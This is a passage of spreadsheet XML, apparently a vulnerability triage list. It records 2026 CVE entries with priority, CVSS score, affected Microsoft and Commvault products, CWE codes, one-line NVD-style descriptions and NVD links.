      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73018</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73023</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73028</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77105</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77106</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S208"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T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77480</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77481</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77482</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77483</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77484</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K213" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77486</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77487</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77504</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77901</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77906</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77907</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
